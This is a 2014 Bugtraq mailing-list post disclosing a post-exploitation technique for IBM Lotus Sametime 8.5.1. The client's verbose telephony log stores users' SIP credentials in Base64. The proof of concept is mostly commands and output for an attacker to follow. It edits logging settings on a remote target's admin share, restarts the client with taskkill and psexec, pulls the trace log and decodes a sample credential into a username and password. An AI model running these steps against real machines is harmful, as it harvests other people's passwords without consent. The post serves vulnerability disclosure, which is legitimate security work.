[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Post Exploitation - Getting username and password in the Lotus Sametime 8.5.1
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Post Exploitation - Getting username and password in the Lotus Sametime 8.5.1
- From: adrianomarciomonteiro@xxxxxxxxx
- Date: Wed, 19 Feb 2014 15:46:35 GMT
# Exploit Title: Post Exploitation - Getting username and password in
the Lotus Sametime 8.5.1
# Google Dork: n/a
# Date: 18/02/2014
# Exploit Author: Adriano Marcio Monteiro
<adrianomarciomonteiro@xxxxxxxxx>
# Vendor Homepage: http://www.ibm.com/us/en/
# Software Link:
http://www-01.ibm.com/support/docview.wss?uid=swg24027054
# Version: 8.5.1
# Tested on: Windows 7 SP1 x86 pt-br
# CVE :
Lotus Sametime is an instant messaging application that includes several
features such as video conferencing, phone calls, etc. .. In case of problems
the Lotus Sametime provides functionality to register and trace log (Menu: Help
/ Support / Show Tracker). When you enable verbose logging is possible to
obtain the user and the user's password (the password is in Base64), according
to the procedure below. The vulnerability is in telephony.softphone.service
more specifically in Source Class.Method:
com.ibm.ws.sip.stack.transport.TransportLayer
sendMessage
Communication with the server is done via TLS, but the local content
communication log is saved in clear text and the password is in base 64. Sample
log:
Out Message: [172.29.1.121:62444->172.28.10.138:5081/TLS]
REGISTER sip:sipserver.meudominio.com.br:5081;transport=tls SIP/2.0
Call-ID: 0.CA3.11C8340A9391D37E@172.29.1.121
CSeq: 1 REGISTER
From:
<sips:adriano.monteiro%40meudominio.com.br@xxxxxxxxxxxxxxxxxxxxxxxxxxx:5081>;tag=3996.696000502281
To:
sips:adriano.monteiro%40meudominio.com.br@xxxxxxxxxxxxxxxxxxxxxxxxxxx:5081
Via: SIP/2.0/TLS 172.29.1.121:5061;branch=z9hG4bK-6283666955645770411
Max-Forwards: 70
Contact: sip:172.29.1.121:5061;transport=tls
Expires: 0
User-Agent: Sametime-Softphone-8.5.1.20100709-0934
Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE, UPDATE
Authorization: Basic
cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="
Content-Length: 0
Using a simple script you can automate the process of getting username and
password, but beyond the scope of this tutorial and I will not explain this
process here. Use your imagination!
PoC - Proof of Concept
Find the file below:
?\\host.alvo\c$\Users\<usuario.alvo>\Dados de
Aplicativos\Lotus\Sametime\.config\rcpinstall.properties?
Add the following lines at the end of the file and save:
com.ibm.collaboration.realtime.internal.telephony.level=FINE
com.ibm.collaboration.realtime.telephony.ui.level=FINE
com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
com.ibm.collaboration.realtime.telephony.softphone.level=FINER
com.ibm.collaboration.realtime.telephony.core.level=FINE
com.ibm.collaboration.realtime.multimedia.phonegrid.level=FINE
com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
com.ibm.collaboration.realtime.telephony.core.level=FINE
com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
com.ibm.collaboration.realtime.telephony.softphone.level=FINER
com.ibm.collaboration.realtime.internal.telephony.level=FINE
com.ibm.collaboration.realtime.telephony.ui.level=FINE
com.ibm.collaboration.realtime.multimedia.level=FINE
com.ibm.collaboration.realtime.internal.telephony.level=FINE
com.ibm.collaboration.realtime.telephony.level=FINE
com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
com.ibm.collaboration.realtime.telephony.softphone.level=FINER
Restarting the process on the target host:
taskkill /s host.alvo /f /im sametime.exe
psexec ?d \\host.alvo cmd.exe /c "%ProgramFiles%\IBM\Lotus\Sametime
Connect\rcp\rcplauncher.exe"
In the logs folder:
\\host.alvo\c$\Users\<usuario.alvo>\Dados de
aplicativos\Lotus\Sametime\logs
Access the file:
trace-log-0.xml
Search for:
Basic cred=
Example:
<CommonBaseEvent creationTime="2014-02-18T11:44:53.249-03:00"
globalInstanceId="ELac1d017d00014445744cd800001c7e" msg="Out Message:
[172.29.1.125:58008->172.28.10.138:5081/TLS]
REGISTER
sip:server.meudominio.com.br:5081;transport=tls SIP/2.0
Call-ID:
0.94.52A702A8618A2FE8@172.29.1.125
CSeq: 1
REGISTER
From:<sips:adriano.monteiro%40meudominio.com.br@xxxxxxxxxxxxxxxxxxxxxxxx:5081>;tag=4518.144797347828
To:
<sips:adriano.monteiro%40meudominio.com.br@xxxxxxxxxxxxxxxxxxxxxxxx:5081>
Via:
SIP/2.0/TLS
172.29.1.125:5061;branch=z9hG4bK-3811914127572726454
Max-Forwards:70
Contact:
*
Expires: 0
User-Agent:
Sametime-Softphone-8.5.1.20100709-0934
Allow: INVITE, ACK, CANCEL,
BYE, NOTIFY, INFO, MESSAGE,UPDATE

Authorization: Basic
cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="
Content-Length:
0

" severity="10" version="1.0.1">
The username and password found here:
Authorization: Basic
cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="
Getting Username and Password:
Site: http://www.base64decode.org/
Decode:
YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==
Result: adriano.monteiro@xxxxxxxxxxxxxxxxx:Amor1010
Bibliography:
http://pic.dhe.ibm.com/infocenter/sametime/v8r5/index.jsp?topic=%2Fcom.ibm.help.sametime.v85.doc%2Ftrouble%2Ftrbl_client_log_trace.html
[end]